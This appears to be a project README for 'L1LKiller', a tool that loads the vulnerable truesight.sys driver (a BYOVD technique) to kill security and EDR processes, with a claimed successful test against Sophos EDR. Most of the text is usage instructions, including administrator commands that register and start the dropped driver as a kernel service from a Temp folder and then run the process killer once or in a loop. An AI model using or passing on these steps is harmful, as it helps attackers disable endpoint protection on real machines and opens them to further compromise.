L1LKiller is a tool developed to exploit the truesight.sys driver of the Rogue Anti-Malware Driver 3.3 software through the BYOVD (Bring Your Own Vulnerable Driver) technique. About 1 year ago this vulnerability was fixed and currently the driver is present in LOLDrivers (Living Off The Land Drivers). I developed this project at the time of the release of the discovery of this driver, where I was able to successfully perform the test on Sophos EDR. Since there is already a mitigation, I decided to publish this project that I kept private for a while.
output.mp4
__ _____ __ __ _ ____
/ / < / / / //_/(_) / /__ _____
/ / / / / / ,< / / / / _ \/ ___/
/ /___/ / /___/ /| |/ / / / __/ /
/_____/_/_____/_/ |_/_/_/_/\___/_/
[Coded by Brosck]
[v1.0]
Usage: C:\Windows\Temp\L1LKiller\L1LKiller.exe [OPTIONS]
Options:
single, kill processes only once
loop, kill processes in a loop
Examples:
L1LKiller.exe single
L1LKiller.exe loop
In cmd.exe as administrator:
sc create l1lkiller binPath="C:\Windows\Temp\L1LKiller\L1LKiller.sys" type=kernel
sc start l1lkiller
L1LKiller.exe single